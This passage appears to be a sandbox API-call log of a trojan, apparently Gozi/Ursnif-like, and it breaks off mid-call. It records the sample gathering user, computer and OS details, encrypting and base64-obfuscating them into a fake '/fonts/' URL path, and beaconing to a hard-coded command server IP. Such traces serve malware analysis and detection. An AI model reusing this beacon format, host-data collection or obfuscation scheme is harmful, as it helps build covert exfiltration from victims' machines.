(lpString="/fonts/8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e.bak") returned 357 [0220.916] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x2cb) returned 0x2be08e0 [0220.916] InternetCanonicalizeUrlA (lpszUrl="/fonts/8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e.bak", lpszBuffer=0x2be08e0, lpdwBufferLength=0x11ff040, dwFlags=0x0) [0220.916] InternetCanonicalizeUrlA (in: lpszUrl="/fonts/8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e.bak", lpszBuffer=0x2be08e0, lpdwBufferLength=0x11ff040, dwFlags=0x0 | out: lpszBuffer="/fonts/8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e.bak", lpdwBufferLength=0x11ff040) returned 1 [0220.918] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fd30 | out: hHeap=0x2860000) returned 1 [0220.918] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) [0220.918] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) returned 0xcc0004 [0220.919] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x2f7bbd) returned 0x0 [0220.919] ResetEvent (hEvent=0x1c8) returned 1 [0220.919] InternetConnectA (hInternet=0xcc0004, lpszServerName="80.77.25.109", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) [0220.919] InternetConnectA (hInternet=0xcc0004, lpszServerName="80.77.25.109", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) returned 0xcc0008 [0220.920] SetEvent (hEvent=0x1c8) returned 1 [0220.921] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/fonts/8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e.bak", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84404000, dwContext=0x11ff074) returned 0xcc000c [0220.921] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040 | out: lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040) returned 1 [0220.921] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044*, dwBufferLength=0x4) returned 1 [0220.921] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0220.921] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0220.921] ResetEvent (hEvent=0x1c8) returned 1 [0220.921] ResetEvent (hEvent=0x1c4) returned 1 [0220.921] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) [0220.921] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0220.922] GetLastError () returned 0x3e5 [0220.922] WaitForSingleObject (hHandle=0x1c8, dwMilliseconds=0x0) returned 0x102 [0220.922] HttpQueryInfoA (hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0) [0220.922] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0220.922] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff02c*=0x1c8, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0221.115] WaitForSingleObject (hHandle=0x1c8, dwMilliseconds=0x0) returned 0x0 [0221.115] SetEvent (hEvent=0x1c8) returned 1 [0221.115] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0221.115] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x16, lpBuffer=0x0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0) returned 0 [0221.115] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xcc) returned 0x2c59c98 [0221.115] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x16, lpBuffer=0x2c59c98, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x2c59c98*, lpdwBufferLength=0x11ff054*=0xca, lpdwIndex=0x11ff04c*=0x0) returned 1 [0221.115] ResetEvent (hEvent=0x1c8) returned 1 [0221.115] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x11ff050, dwNumberOfBytesToRead=0x4, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x11ff050*, lpdwNumberOfBytesRead=0x11ff05c*=0x4) returned 1 [0221.115] CreateStreamOnHGlobal (hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x11ff058) [0221.115] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x11ff058 | out: ppstm=0x11ff058*=0x7ba3f0) returned 0x0 [0221.116] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1000) returned 0x2be0bb8 [0221.116] ISequentialStream:RemoteWrite (in: This=0x7ba3f0, pv=0x11ff050*=0x3c, cb=0x4, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0221.116] ResetEvent (hEvent=0x1c8) returned 1 [0221.116] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2be0bb8, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x2be0bb8*, lpdwNumberOfBytesRead=0x11ff05c*=0x220) returned 1 [0221.116] ISequentialStream:RemoteWrite (in: This=0x7ba3f0, pv=0x2be0bb8*=0x6c, cb=0x220, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0221.116] ResetEvent (hEvent=0x1c8) returned 1 [0221.116] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2be0bb8, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x2be0bb8*, lpdwNumberOfBytesRead=0x11ff05c*=0x0) returned 1 [0221.117] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2be0bb8 | out: hHeap=0x2860000) returned 1 [0221.117] IStream:Stat (This=0x7ba3f0, pstatstg=0x11fefe0, grfStatFlag=0x1) [0221.117] IStream:Stat (in: This=0x7ba3f0, pstatstg=0x11fefe0, grfStatFlag=0x1 | out: pstatstg=0x11fefe0) returned 0x0 [0221.117] IStream:RemoteSeek (in: This=0x7ba3f0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0221.118] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x225) returned 0x2c5fd30 [0221.118] ISequentialStream:RemoteRead (in: This=0x7ba3f0, pv=0x2c5fd30, cb=0x224, pcbRead=0x11ff03c | out: pv=0x2c5fd30*=0x3c, pcbRead=0x11ff03c*=0x224) returned 0x0 [0221.118] IUnknown:Release (This=0x7ba3f0) returned 0x0 [0221.118] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff048*=0x1c4, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0221.118] InternetSetStatusCallbackA (hInternet=0xcc000c, lpfnInternetCallback=0x0) returned 0x2f7bbd [0221.118] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0221.118] InternetSetStatusCallbackA (hInternet=0xcc0008, lpfnInternetCallback=0x0) returned 0x2f7bbd [0221.118] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0221.118] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x0) returned 0x2f7bbd [0221.118] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0221.118] CloseHandle (hObject=0x1c8) returned 1 [0221.118] CloseHandle (hObject=0x1c4) returned 1 [0221.119] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fd30 | out: hHeap=0x2860000) returned 1 [0221.119] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c98 | out: hHeap=0x2860000) returned 1 [0221.120] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fbb0 | out: hHeap=0x2860000) returned 1 [0221.120] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2be08e0 | out: hHeap=0x2860000) returned 1 [0221.121] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0221.121] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fa38 | out: hHeap=0x2860000) returned 1 [0221.121] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2be00d8 | out: hHeap=0x2860000) returned 1 [0221.122] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea50 | out: hHeap=0x2860000) returned 1 [0221.122] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5a510 | out: hHeap=0x2860000) returned 1 [0221.122] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) [0221.122] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0221.122] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff170*=0x13c, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0231.133] wsprintfA (in: param_1=0x11ff104, param_2="size=%u&hash=0x%08x" | out: param_1="size=0&hash=0x00000000") returned 22 [0231.134] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5a510 [0231.134] wsprintfA (in: param_1=0x2c5a510, param_2="soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x" | out: param_1="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1") returned 84 [0231.134] QueryPerformanceFrequency (in: lpFrequency=0x11ff0b8 | out: lpFrequency=0x11ff0b8*=100000000) returned 1 [0231.134] QueryPerformanceCounter (in: lpPerformanceCount=0x11ff0b0 | out: lpPerformanceCount=0x11ff0b0*=2895645715737) returned 1 [0231.135] wsprintfA (in: param_1=0x2c5a564, param_2="&uptime=%u" | out: param_1="&uptime=28956") returned 13 [0231.135] wsprintfA (in: param_1=0x2c5a571, param_2="&%s" | out: param_1="&size=0&hash=0x00000000") returned 23 [0231.135] wsprintfA (in: param_1=0x2c5a588, param_2="&action=%08x" | out: param_1="&action=00000000") returned 16 [0231.135] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0231.137] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xc) returned 0x2c5ea50 [0231.137] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x2c5ea50, nSize=0x11ff0bc | out: lpBuffer="Q9iATrkPrH", nSize=0x11ff0bc) returned 1 [0231.137] wsprintfA (in: param_1=0x2c5a598, param_2="&dns=%s" | out: param_1="&dns=Q9iATrkPrH") returned 15 [0231.137] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea50 | out: hHeap=0x2860000) returned 1 [0231.137] GetUserNameW (in: lpBuffer=0x0, pcbBuffer=0x11ff0bc | out: lpBuffer=0x0, pcbBuffer=0x11ff0bc) returned 0 [0231.138] GetComputerNameW (in: lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0231.138] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5c) returned 0x2c59b28 [0231.138] GetUserNameW (in: lpBuffer=0x2c59b56, pcbBuffer=0x11ff0bc | out: lpBuffer="kEecfMwgj", pcbBuffer=0x11ff0bc) returned 1 [0231.139] GetComputerNameW (in: lpBuffer=0x2c59b6a, nSize=0x11ff0b8 | out: lpBuffer="Q9IATRKPRH", nSize=0x11ff0b8) returned 1 [0231.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kEecfMwgj@Q9IATRKPRH", cchWideChar=20, lpMultiByteStr=0x2c59b28, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kEecfMwgj@Q9IATRKPRHmrKA6_2B0/W9YmJPHIkhA0u/bgk", lpUsedDefaultChar=0x0) returned 20 [0231.139] wsprintfA (in: param_1=0x2c5a5a7, param_2="&whoami=%s" | out: param_1="&whoami=kEecfMwgj@Q9IATRKPRH") returned 28 [0231.140] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0231.140] lstrlenA (lpString="protectioon.cdn4.mozilla.net") returned 28 [0231.140] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1d) returned 0x2c59a68 [0231.140] memcpy (in: _Dst=0x2c59a68, _Src=0x2c59e7f, _Size=0x1c | out: _Dst=0x2c59a68) returned 0x2c59a68 [0231.140] wsprintfA (in: param_1=0x2c5a5c3, param_2="&os=%s" | out: param_1="&os=6.1_1_7601_x64") returned 18 [0231.140] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2be00d8 [0231.140] GetTickCount () returned 0x1b6e041 [0231.141] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5) returned 0x2c59b28 [0231.141] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x8) returned 0x2c59b38 [0231.141] lstrlenA (lpString="%s=%s&") returned 6 [0231.141] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x12) returned 0x2c59b48 [0231.141] sprintf (_Dest=0x2c59b48, _Format="%s=%s&") [0231.141] sprintf (in: _Dest=0x2c59b48, _Format="%s=%s&" | out: _Dest="qgskfsl=kdbk&") returned 13 [0231.141] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b38 | out: hHeap=0x2860000) returned 1 [0231.141] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0231.141] lstrlenA (lpString="qgskfsl=kdbk&") returned 13 [0231.141] lstrlenA (lpString="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28956&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 197 [0231.141] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xd3) returned 0x2c59b68 [0231.141] strcpy (in: _Dest=0x2c59b68, _Source="qgskfsl=kdbk&" | out: _Dest="qgskfsl=kdbk&") returned="qgskfsl=kdbk&" [0231.141] lstrcatA (in: lpString1="qgskfsl=kdbk&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28956&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" | out: lpString1="qgskfsl=kdbk&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28956&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned="qgskfsl=kdbk&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28956&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" [0231.141] lstrlenA (lpString="qgskfsl=kdbk&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28956&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 210 [0231.141] CryptAcquireContextW (in: phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x11ff064*=0x7917d8) returned 1 [0231.143] memcpy (in: _Dst=0x11ff044, _Src=0x2c59df8, _Size=0x10 | out: _Dst=0x11ff044) returned 0x11ff044 [0231.143] CryptImportKey (in: hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070 | out: phKey=0x11ff070*=0x77d0f8) returned 1 [0231.144] CryptSetKeyParam (hKey=0x77d0f8, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) returned 1 [0231.144] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xe0) returned 0x2c59c48 [0231.144] memcpy (in: _Dst=0x2c59c48, _Src=0x2c59b68, _Size=0x10 | out: _Dst=0x2c59c48) returned 0x2c59c48 [0231.144] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c48*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c48*, pdwDataLen=0x11ff074*=0x10) returned 1 [0231.144] memcpy (in: _Dst=0x2c59c58, _Src=0x2c59b78, _Size=0x10 | out: _Dst=0x2c59c58) returned 0x2c59c58 [0231.144] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c58*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c58*, pdwDataLen=0x11ff074*=0x10) returned 1 [0231.144] memcpy (in: _Dst=0x2c59c68, _Src=0x2c59b88, _Size=0x10 | out: _Dst=0x2c59c68) returned 0x2c59c68 [0231.144] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c68*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c68*, pdwDataLen=0x11ff074*=0x10) returned 1 [0231.144] memcpy (in: _Dst=0x2c59c78, _Src=0x2c59b98, _Size=0x10 | out: _Dst=0x2c59c78) returned 0x2c59c78 [0231.144] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c78*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c78*, pdwDataLen=0x11ff074*=0x10) returned 1 [0231.144] memcpy (in: _Dst=0x2c59c88, _Src=0x2c59ba8, _Size=0x10 | out: _Dst=0x2c59c88) returned 0x2c59c88 [0231.144] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c88*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c88*, pdwDataLen=0x11ff074*=0x10) returned 1 [0231.144] memcpy (in: _Dst=0x2c59c98, _Src=0x2c59bb8, _Size=0x10 | out: _Dst=0x2c59c98) returned 0x2c59c98 [0231.144] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c98*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c98*, pdwDataLen=0x11ff074*=0x10) returned 1 [0231.144] memcpy (in: _Dst=0x2c59ca8, _Src=0x2c59bc8, _Size=0x10 | out: _Dst=0x2c59ca8) returned 0x2c59ca8 [0231.144] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ca8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ca8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0231.144] memcpy (in: _Dst=0x2c59cb8, _Src=0x2c59bd8, _Size=0x10 | out: _Dst=0x2c59cb8) returned 0x2c59cb8 [0231.144] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cb8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cb8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0231.144] memcpy (in: _Dst=0x2c59cc8, _Src=0x2c59be8, _Size=0x10 | out: _Dst=0x2c59cc8) returned 0x2c59cc8 [0231.144] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cc8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cc8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0231.145] memcpy (in: _Dst=0x2c59cd8, _Src=0x2c59bf8, _Size=0x10 | out: _Dst=0x2c59cd8) returned 0x2c59cd8 [0231.145] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cd8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cd8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0231.145] memcpy (in: _Dst=0x2c59ce8, _Src=0x2c59c08, _Size=0x10 | out: _Dst=0x2c59ce8) returned 0x2c59ce8 [0231.145] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ce8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ce8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0231.145] memcpy (in: _Dst=0x2c59cf8, _Src=0x2c59c18, _Size=0x10 | out: _Dst=0x2c59cf8) returned 0x2c59cf8 [0231.145] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cf8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cf8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0231.145] memcpy (in: _Dst=0x2c59d08, _Src=0x2c59c28, _Size=0x10 | out: _Dst=0x2c59d08) returned 0x2c59d08 [0231.145] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59d08*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59d08*, pdwDataLen=0x11ff074*=0x10) returned 1 [0231.145] memcpy (in: _Dst=0x2c59d18, _Src=0x2c59c38, _Size=0x3 | out: _Dst=0x2c59d18) returned 0x2c59d18 [0231.145] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2c59d18*, pdwDataLen=0x11ff074*=0x3, dwBufLen=0x20 | out: pbData=0x2c59d18*, pdwDataLen=0x11ff074*=0x10) returned 1 [0231.145] CryptDestroyKey (hKey=0x77d0f8) returned 1 [0231.145] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) returned 1 [0231.145] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1c0) returned 0x2c5fa38 [0231.146] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c48 | out: hHeap=0x2860000) returned 1 [0231.146] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b68 | out: hHeap=0x2860000) returned 1 [0231.146] StrTrimA (in: psz="wIGcS0YfmDDIfDzUwG1Cd4dnsAOK7aWTy6svk4/Y6JpfsTsil0VJchR3VcH7dOWMO96BotPUs4wYb5cwcLx7+ArCy3NYXHDntQjna6vwf2M0sOljj3ZzKkzv7I9R3tvAwaSw5EOjlNF/03wJriQ3MaL1Z7nkennpZf4aRqzAMzdQSnJQ1w3jrZnRt9Ci1xihS7H0IaDo1v6HVOnCV462ho918HxZXDeYyyKntwqEOazxTX8GJkIyyx6rojyJ+iKZllaTpQUK9UrCcq58iKeFIzpNZqywwyzN2sHckONr/kJ=", pszTrimChars="\r\n=" | out: psz="wIGcS0YfmDDIfDzUwG1Cd4dnsAOK7aWTy6svk4/Y6JpfsTsil0VJchR3VcH7dOWMO96BotPUs4wYb5cwcLx7+ArCy3NYXHDntQjna6vwf2M0sOljj3ZzKkzv7I9R3tvAwaSw5EOjlNF/03wJriQ3MaL1Z7nkennpZf4aRqzAMzdQSnJQ1w3jrZnRt9Ci1xihS7H0IaDo1v6HVOnCV462ho918HxZXDeYyyKntwqEOazxTX8GJkIyyx6rojyJ+iKZllaTpQUK9UrCcq58iKeFIzpNZqywwyzN2sHckONr/kJ") returned 1 [0231.146] lstrlenA (lpString="wIGcS0YfmDDIfDzUwG1Cd4dnsAOK7aWTy6svk4/Y6JpfsTsil0VJchR3VcH7dOWMO96BotPUs4wYb5cwcLx7+ArCy3NYXHDntQjna6vwf2M0sOljj3ZzKkzv7I9R3tvAwaSw5EOjlNF/03wJriQ3MaL1Z7nkennpZf4aRqzAMzdQSnJQ1w3jrZnRt9Ci1xihS7H0IaDo1v6HVOnCV462ho918HxZXDeYyyKntwqEOazxTX8GJkIyyx6rojyJ+iKZllaTpQUK9UrCcq58iKeFIzpNZqywwyzN2sHckONr/kJ") returned 299 [0231.146] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x382) returned 0x2c5fc00 [0231.146] _snprintf (_Dest=0x2c5fc26, _Count=0x4, _Format="%c%02X") [0231.146] _snprintf (in: _Dest=0x2c5fc26, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0231.146] _snprintf (in: 